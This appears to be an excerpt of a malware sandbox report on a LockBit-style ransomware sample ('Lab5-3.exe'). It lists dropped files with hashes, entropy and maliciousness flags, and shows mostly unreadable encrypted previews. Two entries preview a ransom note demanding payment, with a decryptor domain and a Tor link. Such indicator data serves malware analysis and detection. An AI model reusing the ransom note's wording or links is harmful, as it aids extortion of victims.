                                                                                                          Preview:,2kT.?..$k5H..6...NG...X.Pz.A....|.....5e..x..m..-..7......&v/......h.g...v.!.....W...l....8.0...$.........7...c.s..o..G........0Y}.P......:.......Yk..+^..5.}W..&.y<.dX.dVW.ZX..8F.w..t!0.zN].k......,c.'XEE;....j.,5s..N....l....j.uZ...Vx.E...+W./.y*...<..2+.......`..A...zy4..."d9.B..."o.s.Y"....B.\d.f.......4...M`H.P.....w......x...`.js,..o.'....O...w.5l.{.E :g..Js.......z.;....9._....^...I.v.F....MT.R.......o.................l4.....^p.......p.d.I41.7>..Hc4.C..).P.....?{^}(.vQ5.y..."Hmq............L.6..Z.Eqr<.)C..\~.....+."l...H.......=t.3%.D..l).....7'.._...%....c..qAX./n...:r.....{\.H0..P..n.....[.d.s..%....~c...'1E..&..k\+g.O.yG......#.L*_`."K..8|....8.APe..{........].eD=z5..J<..].5...1+...z..v..6..q.Q..f.a.f..3..ZX.2|..).G...g.F.dB../...h..7k.h.[&.V>.@;yrj...!.....u..P..y...5e/. )..o.. pf;.N.p}\....:.T...|m...q.....T.I...y.p...RW8.!3...W....8.....Jd.5T...'q..L[...B.n.C.P...!z.v[..me..H<J../}....F.x..2.*...."T`MotX.VX.w...N..N.y.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):110320
                                                                                                          Entropy (8bit):7.998205486110469
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:++XEBNIhyFtxzLOdYVD1PCXhnfbNuox9PsZ:AbNtEkDhGnfbZTkZ
                                                                                                          MD5:5BAAE7519369E509468D22383E53F88E
                                                                                                          SHA1:A4F983B117A7475EEC81B7F2EFD108A0C5B1FBC0
                                                                                                          SHA-256:AE567F69A6B436C9906963E7B3FEF3AF0DEB7C6105F1FFBF2F7C5CEBC18C19AE
                                                                                                          SHA-512:C8AF18F6CCC8A26099470E408C622C43652F3CB324423C591886E1C824DFACFD5523A7BFA9F1B129B370CF1257053EBA912DB5A47C8C6711DFD9D66422E3606F
                                                                                                          Malicious:true
                                                                                                          Preview:u,......`...:...a..a7.>..Q...MM).f...ye._..-U%n...-...H.u...X.1@.F..A..z.Q`C..XS..U5.8x....e....oI...?j.......,#...K.6|...F..X.K.'..2...^......n..H.}..'>.u.)}.t.t..aW|...'.....i..T..............:..........+..5d...?..k,?\w2z..L.....f..u..V.......`z......_.8q../.{...V.$...+R....~.F.57J...>:.?..A.......P...ih....J.....8X.u.M..=..P...J..XI.....9.....WU..N.....>.....~+.&R.5wKg.?..Zzg.+..$.,?g.I..H.L.f.ntX...$c..X........L-./....1.`hfW/*.m..f.2.pW.[..@...(,.Q.^-%..&9H.._.;.A.......mH.......G:..p'A.x...s}...\f.e,z.........u.8..')E.9.e...|.)o.b......M[.\ M....!.......+..L.i...*`..d..K..C&..1..T}..S....i.B..eP*o.(...._..`.FJ...f..K..$....N.=u....R...rw.E.]?.....;g.h]-.u....b.p.s\(.oc..[wP....'G.40.k.Si..t.......Z]0. .D$.^..^...-W..._5.cBnf.K..lV.qt.4..u|..h..Z.^.8.,+..*....?......=.a.r.aC..+>...:W.eN.<.fE.\.J..z|..n../.c.g....lr.x+...HgB.4e.c.&1BqB.]..'!.g.,._.L..XOdo.J..C.z.p...6...^.19......R.ih..Y..rz..{.......c.b..Y....-,\>w.0.2..._.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):114064
                                                                                                          Entropy (8bit):7.998098290473877
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:NsPb39waBY9gXHbjzOMlcKDRX8EDEorBsMKqYgSDXGfvEnVVzyRqu8dsoOwhrZ:Wj1iW3bjyacKljAyBsMtiuvSCbvoOkZ
                                                                                                          MD5:55103E718E0F2C7C890EFA7C2E649CA6
                                                                                                          SHA1:9ECF272470DA0FDFFB4665601FD9E8D55DF97A47
                                                                                                          SHA-256:9777E90C2DC612EC6282B2A2B4EE756A873C9773F0DBBE8802896022BBCADBE6
                                                                                                          SHA-512:6A658DCDA4BB00AC7C0BB6A409D3C699A120C40B771B8CC2F0BAABA7B1602CFC6658FCECD57360BAD79C1EAEBC09F653C9BEF1F43E6E4C6BA1ABF9C724CD7DE3
                                                                                                          Malicious:true
                                                                                                          Preview:9).#EbC-.G".<.,@.s.....j..>=...V.ea.Aj...E.........R~m..S.{.....qH......m.m.{.M..uWjp+.R...>.JR.p..--..?HN.....uo....l...r~..........7.^..,?{-3.4.l...."......jh...:...@M...?...l{x.{...w......'...C.tqg.......Kd.JM._7.2"E.kL..V% -......q!O....Q......)Bn*..B/....CH..2.D..^DQ..1V46....A..."....Ci.)....\.....w.N)$.$~.....n4|`j$...d..-..V.S.Cg.......J^.u.u....0..L"....b.5$..m...^j.....$2.*./.[.g.[W......\...........72h$.Gm^.K..._.....>...yLd..Aq.....S..R....or.[.>*...@Xq..E...0N.U<....X.{@...D..uu.V.L..7r.N78.[..z.....s2.g....h..|.X...J.D_3.....:...4.....~.8w.K.....0.h.y.To$.....$.[...j..uD<.6.V.u.....[<S;.^..W.Z?`.L....m.^..G....{....x.4.Y........f~..I..7...J+.....y.e.d..E.m.A.?.]#.[....j....(.. ......:d.,...g............P....G..e...T.e........C.I.'.F...0.$....o..q...o.: .o...x...........1Y...~..7o...............Q..z.Ed.q.P.`:|O..+.6...hz......0o...X......J....W..x...Z .W.l...=.e..-.....v..>..g.!q...@e...D.C..u...h...D.f..O['p....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10838504
                                                                                                          Entropy (8bit):6.8684413369062405
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:98304:Fp2h7JtNDBBbE6ndmxXjgNfN5t/U2QZn1+Qi2KBGPFjIyly9DqA:Fp2lbNDs68Zjglvts2C14c9jFoJ
                                                                                                          MD5:2828D6FEC45B99993B99762C425107F7
                                                                                                          SHA1:064A799D5E01B5066E055EFB283D0F0E8D207285
                                                                                                          SHA-256:CCD9B2CC59E29FE688C206F55EFF7B3B844F844A3D2473573C2BB1B2D71B395B
                                                                                                          SHA-512:A265971C52BD65CE1CBA5679A31AEAFC52B5792F4C9CF33EB2AE2EE467F04EC315BF6D76D01A7C36C7D553763C3A6D162ABC6A1E36ADA9CC8A0691A5BC7A5CBE
                                                                                                          Malicious:false
                                                                                                          Preview:....\55-....4p..!..9d...v/.hXf*e"dN.. .. ...p{.+...K.*u.'}q$<.Ig.j..9......d?.^.1.>.2.. .^Tx..[B.I...0..m..A...`.. ..'E..,Y.C..[.u..w.'.VZ....B.H.`[...,..k...S.yG.YF....k.t...R..#.*.E...z.C..g..2Bc.B..7...O.. .#.0WRf,4r.g,RV...]t..C.3..^@=`...x.foZ.U.t....p..OJ.oO..*.a*4....4.(.4...G.....z......4.".f..O..R....C.....&......).KS..1[.M.g.......L3...h.l.\B..JJ1...m.,....^....,.{$...........J..*....q!.q...c.......a.c.j..4......e{.....#........B.H.L...C<wB.........k.T.iX..$.j....t.s...k.E..j....0(.t..%..>.9YF.:..o!..I...x....!h.7...+..DU.......o..r.E..jf..^..s.]...-..n.-|37.'.....0x3......lP...9..ED.?..eY..H...:.....:..o.........En..9....tq..'lm0....z.U....C....Z.~.!.o....=..|JF..#g06.f.K0.....1.cW.....y....b.........Gw.5.=..A....B.M.%b&...)..C.2...S....h13<........7..T.=...`...,1E.8F....c.B..0E.m..>.2.!...l...x.........m.....g]..+c...."..o0.B/...nU..b.C.......6...u.mz_...]..B|...P.`.,"....a...`W.??4.u.K.e.i}.2I.e&.......fH{(.......W..Z....(.JO.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1091560
                                                                                                          Entropy (8bit):5.238373526706706
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:BNFPQ7pfAJ+SJH4e2tnMUZbODznhWUSVvaGAFKt7yRG9GdbSB5fVB8omfyF5s9Ne:BNwifR4eCMUZbajmLAF6nGIcfyUHm
                                                                                                          MD5:C4241352D01F5A8CE74B43053A1A7229
                                                                                                          SHA1:510A0BB9646C0A2EB09D1A5B7371EF2229AC6AD4
                                                                                                          SHA-256:F679CC03E11C906470797106AF45779BD82F4354078A6DD7D40387DE2B59D7A7
                                                                                                          SHA-512:8B5EB327E2D9DD5FCAF8BD8D7782D516D1657E8D3A92E2E928A2C06B2A6D1D5E400C8F56BBE5F5D808B3B0B79956EEA8D12A698EC34FFE04385C6B8AAE5C5B0E
                                                                                                          Malicious:false
                                                                                                          Preview:...jg?..#..U{G..|`.*E.~;.7bAF....(......`.?.j/s.F.n....qTD.;....O....2.....l.m...3..{?.J....(In._.,b.$.P.l..-x......p.f.....D...m.....Wv.T...;W.I.@H+t.?..[;.&...+..>.V%.J..o{..3.:.;Nv.Qe..K...BT=.b.S...}.RH.dR.......+q..a...j...K;Z..>#.. .1..U..-......q..._M'...T..v...4.:(.^p.....e........|..\1......0=.E........*....{9GC..T(. w.(.'.....hF.;.....>p....0*....n...\TRV..8......>.l.....+g.....|._G.j..C...<.+...~...BL..:.q.0X:#.:j}..~..z`.,d.u..e...-...lq#tA.u.l..j.............d..db.....q..X...P._k.....R>J...HkOo8nV.AH...%.....Fg? ..l.....X.,9.....Y-....d..6S}....p...G......&.h.j..]`.>w....A+b..B.c.......;K1..\....k4J_....Z...cn..?..7.}y.|7c.;/C.....=.+..7:|......_.E.#..Q.5.%.kG......f..J..k...E.n.xPE..)..=&..X....S....A.B.G.(..?@....(d...U.T.&....&...NU...t?.3]T<iU2.G...t(}..................7..t..K.L`.....uK....vn.0..y.Ge......h..^mU"6..N`...Qc...;".\Z.L..sCB.. .>....>....g}....cEk.."9]..... }S..R..................1.j:;.8..F{o..._....I.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):167392
                                                                                                          Entropy (8bit):7.998669119855604
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:5hKWApwJ2vDCyf9W2p6HfKUGJLFCOIOxetTWVDYXjlaAEYOj15GmnWDcGG9Y3IiB:DOwJuN0yUGJLY6MtTWVD6UAAnGmnWwdi
                                                                                                          MD5:C647246DB91F312BE642CF1D8FE52FB1
                                                                                                          SHA1:686B22991D94F59DA896895B09AE147ADDB132AC
                                                                                                          SHA-256:B0C9B60F3A3775AAFC02EE99155002E009473F76C4942027F924659EE9F50F2B
                                                                                                          SHA-512:8C388EF5FA80906BD85FD82C8252BC40E4836492379D3C517647A405A9475480EBB2FCA43B4B523D8EB17D24D01C3089B959D4ECDC3F8224D5BBBF4B3195C990
                                                                                                          Malicious:true
                                                                                                          Preview:.....).B..k..%7.{..p.........H......o......q.hV+..=....u.@q.U-m..i...B`...!S.N.t.......y.f.t.&...N....Z....p...XV.2V.FzJ.....L.x}...5&n...-;....Y. ...?..~..9.'..@O&...V....w.`....%....M4....."+&?...Z;t.1.*.~.Y..xq....2.H7.c"..SH%....Iu.n..v.......].....PKD....Ve.....].}i..%...H.....i8...;zrc.N......]....a).M.A.'B....B/....Cxlx......J.F..F.^?A.V.0.....,N..qD*..k .^.P.ws......l......t.<#..7..1....ED.b.P=...=.P.Y.$...6...e.D...T.er..[...)Bq.!..+.\.Pc9.....e.~..-e!i....$.4<18....u.-.o...Uf.>...G......9.>#....T...cXF...U|.uG'..S...KE......K?.;..onh.T_e%.N......K..r...9.A.g..u%.Q9cu.}P..H`ru..@N.....P.........\!j.b....`... .?..d.y.@.q(...|Eh...........F.f...$....#7.R./...p..Poh.9.$ki..8.}.M.Q."W...`."SG..p.P.....D....;..7..'.4.....Nw.9...d{..5..B.!f.7J...$.......d.s....$_..(.`...0..MBx..........A.G...u........m.V.S.gI..%V...E..R'..``#.g....4...+V.;........U4..t...~.xb~2.h.h......pb~..y..8..!N...+..c...Ic..^~z%k.E........9.-8g.|.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1635304
                                                                                                          Entropy (8bit):6.849519225549279
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:uRSjqgRmtb6hV9CaQoGk8I/8JkGBT2d8jjCt:IsRmN6hV9CJI/8JkGBTdK
                                                                                                          MD5:2F9638CE2B4E4F584ACC23DADBA9104A
                                                                                                          SHA1:3073CB060A4F33EE6F0408D12CE5E5AFE969B0F1
                                                                                                          SHA-256:F676B8E2DBCC2DF6EAFD1E74D3D267990FD7B34EEC8865010D3FC9E122C1EB00
                                                                                                          SHA-512:B15646765DD6A3B5104F437E4A09934D9915BB03EC249E4E58CB34FAD5991BC476CB50E8466E412C2EEDB88A8EE65C3BDE3BFBFD17E94C9C7E88C1B283F3E0FD
                                                                                                          Malicious:false
                                                                                                          Preview:^..w..*..aC..8'_..M.cpzc.?{..S....I...`1(..O..R2.D...qF.4.S...9i.....]&],W..@v...2.,....n.b..5..E.l....r..o_..P.$..zP........_{.........h.(..Y...jj#t....0...R.j!0Z+:...b..a"$...Q...]..K..v.L..@.!.FX4.x.....,(.$s?S.j......x.......v4.U...S .mJ31.86.H.P.W/../..1v.wF.......Xx...X..-..J. ;."..........r.mD..SQ..J...S,..(......f,A..y._`V.M`..P{-.XEr9.*..g.yN......9.9$....\X5Qy....O5].C.OA|{q.S....A..v,...<]..P/n..;..85..c....".....9..-.fD....K.+..o..:.%c1.....7.8..#...=./....-N.1.g..l.m%zc.......?.-m.......CQ.&..0...E......y.....6.._..%+...f..p<.D.m.A.2DBo.0..:.j....#..,.Y......`....{.+.{.......[...76.N(I.1V"T....[.r.M......<.DM...E..A#x..c...."wr.Lqt...2........]|..{8$+...>n@..yE}80H...............].2tF..8.7..7i..T......:..}.....OgC....4A4........y&(I.....S..5jK<O........E..|Q`.k.^..#....#nW..".d;+U...Y...Y..h%... &.~.B...E..R} ....[....^k.e*l.<....y..NA.....Na,.;..T...,H?..,6.......j.f.Z...**uA.d..F..#...aKc....c......T..J..Y.....e<.+.....K
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):322536
                                                                                                          Entropy (8bit):7.87155759660938
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:7KkdlV82eapLbNpbkYDf3lKFT1NudIb+cselJBCq8zooYcFoCV3enYSW2Z:vPV8u/bk04UdoJpJVOoo13On
                                                                                                          MD5:0FE5AF4325145A173603DCB405C88021
                                                                                                          SHA1:4129245813A20317D37034406095E6C209EC9400
                                                                                                          SHA-256:6DC3B04BA845B8B1E1543F28E86374C1A5FDF4B4D8368568FD072F5581C8D226
                                                                                                          SHA-512:B38BEE0885A65D1A1DF04CF6B3AFFE512E07AE526F400039C0C77BF91666537CBA246119A2F4AD22FF3E01B510E780B6E526461D1454340A04FA86A931F24A7B
                                                                                                          Malicious:false
                                                                                                          Preview:.q.,.e.E..%..hg.<..../...f|o.=.ts..W..L3...y..y:..R!V.........w.S...8.................JkY...f.Nb.9A.u..k'F ..c.......Md5t..GP..Bz....y.y...i......[,ZRu..BJ..< C../.6.$j.K......./2.E......=..Tfxa...\%.q.....t....rk..........}.u......`&...j.T\..h...{;.xM..?..D7m.j...O<.j.......I.v.3..)...)./@..FG.t...q:.Y.).r`A^..P.W....;a.1...N]U.....Ve.#J...&.. .Fc...s..h...)..^..b/....)...dwP......!TM..tL.R.O{[-j..........)R,.Y.k.%....s/N..N.<7.+..m..7d..|.{W..`'?#"U .............Cb<....@..5.._i.$........h!..A......n..+...Fn.8.6.a...@...@q..2..p..z....E....I..?N.T...@..fP....m....2..j\LJ.1.f.%.]n./q%R./.$...c...SOd.L.>.0n...Ad..wd....g..=.T...*Hwkp...G..!..o..6A..a.s...)WO.>..]aG..t$@P..c..m).....tE...kjQ.............PH.+).ad.-<.EF.h^.)i.xO.0n.G...j#5..{1.P?...8..$zz<..bfA.TL....W.j7[..u.J-e.vW....a..]....d'...lL..c...@.oKV..v!.'....Zr.....<..X>..kF....Lm%......r....5..e0p?k2I.. D...g..O..:O.i....G.........x(.5#.P..KJ..H3[r.'...q.e.....(L..b]......._T..s..Y.....CM'.ip..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3891176
                                                                                                          Entropy (8bit):6.194094252972279
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:Ww08od8NEptEyhriTlbWeOsIyqtz11szhhaUI+pB9cnaoXjkwgDONtqf6bw4IQ16:b0NdyfykxWebIyqtzHSp4UH
                                                                                                          MD5:B169B9C52C5D9F106DEB392AA9BDE9E2
                                                                                                          SHA1:4E7CCFA8E2E098BEEC68C3824224110BCBDAA158
                                                                                                          SHA-256:61A124F954262527930760AB8A246EC46C0E8D6CD756C5680EFEFAF1F1743BA6
                                                                                                          SHA-512:33B51E0923ABEEB78B9321A9C842C3C097F4327EA3E1FDF2AE561DED33529F3388063E31BEDB7D7F1425568FC8CA3251DFAA50B897B6C0D11D4C166FA1049FC8
                                                                                                          Malicious:false
                                                                                                          Preview:^.%,G..WZ..<a*^....R.b...|.<....T..]b...8..........q.G...l...)u....A...........+.{...7.#(h......K.h.gU...nl.J+.G...a.,..eM.}S. .S--~>.J..>..9.-.....S....=..;KV}....5.gON6.....Z.C.....X..1zT.f_...O.,......`.MnP..6.4..gO...k...T3p........N...-y.*J......Zs.&q../.(.l...R.)c.%...U.G7_.u..`.....;...qG..U......~.J..h.8..A.5...F_..O.t....7D#...W].Lk...v.n...I._~o.*..........W..l......k}H..._.....jT5.s.....Y2@.....#..,...q.....^.ne...FJ~VH')...K.YIb...;...Y.$.a.7.\l.9DS..M-"....e*..DNz1.;n...J.....?..../u9.%.q.......:3D...43.!.h....I^.f.MA.Ly...).........Y.C..v......k....H...z.......:.h.c,.. '.....@}.!\O...L...iQ....|.wK....{I.J.."...`...=.{..I...T'X.-zn)..`..........Z1{._WU.k.:+.px..'.t.@..d.u...y.........`Q.uB....e....]fdQ..,.#.r..5.7..(.A?...3t..[P.......M.`_..a_....H...rc...`.#[...n...,.Bl.kN......{?}.l...]....n.....svi>.ISS.;....'...w~.G.......>jU>x:.".B.m.>.X.....GE..nW...@.n...D5.yT)A...(...<...&W......T+#..O.LW\...y.G...m....\._..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):266216
                                                                                                          Entropy (8bit):7.999224086851303
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:6RtJBAZY6Lvz3fRhsJjeNSBxwguoySzuByvN9EWJZ:yavTRhD6zyzIND
                                                                                                          MD5:08F5BB097318072D96FC3664D1B48CB9
                                                                                                          SHA1:960107FF5253A0FCA53877B636BFA91EEBD48F7B
                                                                                                          SHA-256:03EA5C93D099E2E74D5B647D135B648D2F0F3DAC9E50F9249A3991CA8240150E
                                                                                                          SHA-512:CF45280BD9CEBDC049103B2F402045C9C1A3265731DA5580193BB72D060CED9FAD08FEA0FDF7A14C25469F0A6709DCB0D03A24B3B4B4E6DF5D9328F1FCAA0888
                                                                                                          Malicious:true
                                                                                                          Preview:.*e6...b..D..8......._..O._. .5.S.ae.C.....v..z...p...\.?.Miai.k..A..;...t#....U.xo....8J....D.3!....k.v...s......+..?.=.......CqJ..~........s....\..':.....M&>....6..y.....2T.x..>.....u.-...(..U..V.^...CWx....l.S....(......~....:.../.iH...^dQ...ka..d..i......O39.-'~.;..]..\....A..e...n....(.w8....s........s..t...~u.t..JMJOs..Y..H...I..8..,..(cREvi+v...G. 0v....%.D..":.......kdk.....|IuE._..~r..4..{.Iq'.}:...fk..)-....-7.../........&...=..R.q].8..,...GE.Yc..d.&.~U.`K..]Pf'qD..(^be@V....Tm.....0..L,1..E.&rv.3d.....h<.{.a.Cn.(.[t!,..l.....$9....7.;7.2Ef....A..}...*R...]*..._../.p.....w4GzM....7..0.t.....$........>.F.....p....3:..9..)V..0...n.K..i.j.rv...,O....1~.jEKH..+.....cdJ..T....[.>._./c.....`.p.....6...e.1...p....C.n...F....L...Wl...DJ.|.`....Sl.oZ..hr.ut...~.2`.2SS.........x..+ZY.~.p}.D.....:.d.h.eo..*....l...9N`QZ.X.(.....I...J.%V...%.M0.........I..48w_GJW.HG....d[".......:.1.9j.N7`}<.....Qu...4o.h..GDM.M.q......!2....#-...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):975336
                                                                                                          Entropy (8bit):7.05579369129114
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:q4utBY8kzCj37++BdyyFKNq0xfbc/sUhHfWAVgA+QPuvjyzFoE+oAT9s:q4sGq7NPk7Uh/WAVH+QPLohW
                                                                                                          MD5:7A0859EEC7B7ED4272C06AD8CADA45E5
                                                                                                          SHA1:28EECA95749385643E2DC0C684A2CB2421051DA5
                                                                                                          SHA-256:F72B0F1E1FB37579D2BD388BC114374653188559513311272D62BCF74AEBF099
                                                                                                          SHA-512:C91430D28CED6F02CB672EE66435E547776655B82DE0868A675522FA6D470D6A2491B570B8E1ED6E508106AEF0F9FDDEBCA438EA6BEE045C5C078F0AE57F3E96
                                                                                                          Malicious:false
                                                                                                          Preview:..:...g=...!....b......9#w6.8....X._..l..?..E.g.sM...OR...r..)..W...j.....%..D...+.>.....v.`7.TA...a.s..#..s..%...Ox..zTGk..#....L...K..\.W..=.<B).VK.w.f.mE..v.D.>'.........yMU...q".)epx:.2.F$K.c].a]..KS.\m...h..@e...Q-1.....g.=.U G.+.p.$]*.F.....=-}.\.Ok..U..D..`........#-.Z.=..u..r.j:A.(m.dP:?I...}...u..2. 4Fc.9.....%...}...gTa...Y.B.f/h........1^...Kj`v.n...cyV...U..V.F......|iI......lv?Z...SG.....s...4..-...3...mhx..Q.J..W.%:\.L..[.~.%A.1.>..G2..2p..,D..(0.1;.4...P..=msC..........My.U.R......o.WH.g.......K.5}...'Y|P.gh.O.WU8..@..1....o..F[x......B3Ps...J....O@.,...J;J..Ks}li.x.6.j<.r.`".. o~z..o..KA.d.w.5.-wC,s.w...B.Z.Y..qs..3....#..L]....j..Z.K..s..h...J......!..u)....Bo.....&.~....7.@..4..."x..vA...:.P.0....1..<r.Zp...m.I.....'.z.i..x/..$...y..=...;..*..C..=.P......5*.....~.3.H...?$I>..;i......Q...C..)K....i.x\.wr....Z...y...Fy...\zkx........>?.hTg.._......t.]......3k...R?#G....(......c..q.T#m.........b...7.....8...}v.?...L.B.`.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6539240
                                                                                                          Entropy (8bit):6.044923769238911
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:196608:AxfiRewl4j74cW4SltWbS3F+r8vLHSOOG:AcRewsG
                                                                                                          MD5:4DF249331CDD1796102BB2CD1FDBA3A9
                                                                                                          SHA1:55358C208B5CDD03637BA47D4D262CA0658CC721
                                                                                                          SHA-256:60B0E115BAC7E9F1B32CD377F9F53DC41D366266572C3F41B7FAA42B143DB23C
                                                                                                          SHA-512:663D4BF52C24036C597CA9E3685061AD78364D5A32126885D3858E162BEFCBB51E71E0CB15AFA1CB08AC571CB1B101BBC88D53CB7554C8F8A5AB5D0711299C1F
                                                                                                          Malicious:false
                                                                                                          Preview:...@qX..IiL..G..cIXP.v.....5oN.....%....j....,...%.>.a..e..&.z...7.!...z.d.\6g.4S......G...3gx^.p....F/r.`..r.,.."j!......l.n.i......(.....8SA.?.^..|....'.IN....o7.'~....../.W..n... ...6.<..,>(..A%.+.w..o.h~n....{.`jK.Y..a..%.V..\i[&..4... .GL-..h..3..R=|o.p=.......="...*.g...P....1..W.t..Ca..+........`.......~.../.$..{.kh...&..gZft]^.H.>..T.Z<1."M.l..%.".C...z.....]E..$..#o...{...9H...J.0m..)fA..S5.6/.A2....F2K..~........Q....R ....eHB....t...(....K... ..j...n....X.d..8..'.|..lYz@..u3..V.}..C.}....svc..<.f7...j.,.-3.&......K./..zg...G....;/......S<.I.....!'E*....r ..A...Q..h.8.....[....B.h.zPm...$..h.!!......B.y...9.}q|.\.x...9.e.....5....0H.......5..5D[ .I...J..<w.....P.._.N.O..?.?....s...{....!:..0....@....V" .h.+.f..*...A.....$.-'.6...........Y.=.x.._....t!l..UT^<.3.J.....&.. 2``..i.%.N........d...xs4../.......9.:9V1.. .Q>6K.p^........(s...n...P5:...Tm..e]b/...0tH.S......`[....n#.E.=....M.J..`n.k..0..6F....R..%.w...8..-|f2
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):155664
                                                                                                          Entropy (8bit):7.998855736597512
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:ADQZ2dSAYdnVtXxI/nSjBg+oTDWOPs9fwgREOJPlzvYtn5TmSFbZ:IQZ2udLXm313WnFwKPluqSVZ
                                                                                                          MD5:167215173DA8D9D3E499B1DEFF122982
                                                                                                          SHA1:1B3F35B8F45159149B0FA7F8211EF0BD38247A15
                                                                                                          SHA-256:9E959A9801D4FCD0741BCF99CC0D559E3030B201E6A772870D0088861A3ABEA2
                                                                                                          SHA-512:900BC6F26B412AE14452C69BA5F1723F98EA0315704EB5411700FE5A5627ED0531D36D8298DDC4F11318365CBE48A2CAD49B9A8519BA14EB052BA8E9745C2008
                                                                                                          Malicious:true
                                                                                                          Preview:rEM,H..1Y...J... B......J...H.Ua...+Y.Q..P.W0P...nE.0{....Q;......T....^.X.....x..6..iJ......P G)..u..:. .J.\.ir.).F.r....&&.7.R6.|......Hh.....h...<.E.._...t[.}..u. |....o>.U....0....~../_.x...qpS.........V.....&...w...|.r.2z..\*X..G..f...........G...M_.....X..M<..N.U...[.......7.r...m.uq*.P...^.E&Q|A..>jzT(_<A.s....`vZ4Y....va.......~.t...N.B..Qy.0.Wr.7(.P..S)8{..q.Y...z.,..H.b+Pa...&.nW..Y...o..s.kr9x.0)....s..*7.d......&...>....+...u......5Q.v.i.` .B...^X..K?.......%.h..&.&.>._i ...;...q..Q.:.&...v[.. .D[d..<.C.3...]!9.u.P..L2.u.+....).t.p.>......5/.qT...=..1...v.....~.....~.|.........2....p5...o..A_... y........`.F....xy;NA....F:.,.."%.T}M.N...*.O..-..g.._@.....=...2........:" .ya..=.e..u..r...~.........-3.d.u.U.G....3HX...q....4.T...u@....=O.... X...Z.]..sgbYY_...<..*....T..bcr...v...@L.._.#...lh.m.`.8...(.hN....z....|....x...].....[.x.....c.z......=.~.G.e...Vj..L...... X. Z&p1..V.F..L.-H...8xJ..qu..mM...D.( .....^...lNM.,
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
